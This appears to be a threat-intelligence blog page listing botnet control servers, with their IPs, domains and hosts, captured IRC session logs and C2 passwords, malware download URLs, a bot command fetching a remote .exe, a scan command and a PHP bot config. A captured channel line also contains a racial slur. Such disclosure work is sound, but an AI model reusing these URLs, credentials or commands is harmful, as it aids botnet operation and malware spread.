Another http malware spreading around Panel:http://188.247.135.32/signin.php Network Activity: Host Name IP Address tretr23.com tretr23.com 188.247.135.32 Download URLs http://188.247.135.32/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D07DB5860B2E69F2DCE5CA8B5FF9F6DADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5854372&v=2&t=0,4527399 (tretr23.com) Outgoing connection to remote server: tretr23.com TCP port 80 Host Name IP Address ytreytre.com ytreytre.com 94.63.240.235 Download URLs http://94.63.240.235/temp/3431.exe?t=0,4103815 (ytreytre.com) Outgoing connection to remote server: ytreytre.com TCP port 80 Host Name IP Address tretr23.com tretr23.com 188.247.135.32Read more...
negro001.com(ngrBot hosted in Seychelles Ideal Solution Ltd)
Resolved : [negro001.com] To [193.107.16.131] Resolved : [negro001.com] To [92.241.165.152] Remote Host Port Number 199.15.234.7 80 92.241.165.152 8782 ircd here 193.107.16.131 8782 ircd here NICK [USA|635435] USER 8770 “” “lol” :8770 JOIN #moo PONG :Threat-Expert.net NICK {iNF-00-USA-XP-COMP-7188} JOIN #hold nigger PONG Threat-Expert.net USER blaze * 0 :COMP hosting infos: http://whois.domaintools.com/193.107.16.131
208.67.252.118(irc botnet hosted in United States Buckshot Enterprises Llc)
Remote Host Port Number 208.67.252.118 2345 NICK [USA|00|P|65160] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-2443 * 0 :COMPUTERNAME MODE [USA|00|P|65160] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/208.67.252.118
www.facebookvideocentral.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
Remote Host Port Number 213.202.225.40 80 213.202.225.48 80 74.206.242.164 80 46.45.164.166 81 IRCD HERE NICK [N00_USA_XP_8072956] JOIN #c MODE [00_USA_XP_9406831] -ix USER SP2-351 * 0 :COMPUTERNAME PRIVMSG #bs :HTTP SET http://46.45.164.163/cc.exe PRIVMSG #c :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 15 threads. PRIVMSG #c :scan;Read more...
188.190.96.148(irc botnet hosted in Ukraine Infium Ltd)
Remote Host Port Number 188.190.96.148 8087 PASS bich99 199.15.234.7 80 NICK n{US|XPa}mlqlmaj USER mlqlmaj 0 0 :mlqlmaj JOIN #cash bich99 JOIN #US hosting infos: http://whois.domaintools.com/188.190.96.148
178.63.199.34(3vbot hosted in Germany Gunzenhausen Hetzner Online Ag)
Remote Host Port Number 178.63.199.34 6667 199.15.234.7 80 NICK New{US-XP-x86}4687226 USER 4687226 “” “4687226” :4687226 MODE New{US-XP-x86}4687226 +iMm JOIN #|3vbot|# PONG :irc.priv8net.com hosting infos: http://whois.domaintools.com/178.63.199.34
java.alb-team.com(linux bots hosted in United States Ft. Lee Righthosting.com)
albanian lamers hosting rfi bots for ddos var $config = array(“server”=>”java.alb-team.com”, “port”=>4242, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”#bote”, “key”=>”142536”, // “modes”=>”-x+i”, “password”=>”bomp”, // “trigger”=>”!say@”, “hostauth”=>”*” // * hosting infos: http://whois.domaintools.com/66.78.3.76
87.251.154.156(ngrBot hosted in Russian Federation Moscow Anders Telecom Ltd)
Remote Host Port Number 199.15.234.7 80 87.251.154.156 1890 PASS r00l NICK n{US|XPa}mqecvfh USER mqecvfh 0 0 :mqecvfh JOIN #bots r00l
latincrew.biz(ngrBot hosted in Russian Federation Moscow Oao Webalta)
Resolved : [latincrew.biz] To [92.241.165.124] Other domains used to control bots: xsstorm.com 87.255.51.229 latincrew.biz 92.241.165.124 gu1d3sh3n.cz.cc 178.238.36.17 92.241.165.124 1234 PASS xxx NICK NEW-[USA|00|P|01507] USER XP-5713 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|01507] -ix JOIN #!nw! test PONG 22 MOTD exe file: Download Download UPDATE: 64.202.107.109 1234 Now talking in #!nw! Topic On: [ #!nw! ] [ .g.fRead more...
xD.a7aneek.net(80-100k ngrBotnet hosted in France Paris Gandi)
Same lamer with big net and still hosting with Gandi.net Resolved : [xD.a7aneek.net] To [92.243.17.156] Resolved : [xD.a7aneek.net] To [92.243.25.164] Resolved : [xD.a7aneek.net] To [92.243.0.109] Resolved : [xD.a7aneek.net] To [92.243.27.72] Resolved : [xD.a7aneek.net] To [92.243.10.12] Other domain names used to control bots: xD.0dayx.com appupdate.org xD.0days.me 92.243.10.12 5900 PASS ngrBot 92.243.0.109 5900 PASS ngrBot 92.243.27.72 5900Read more...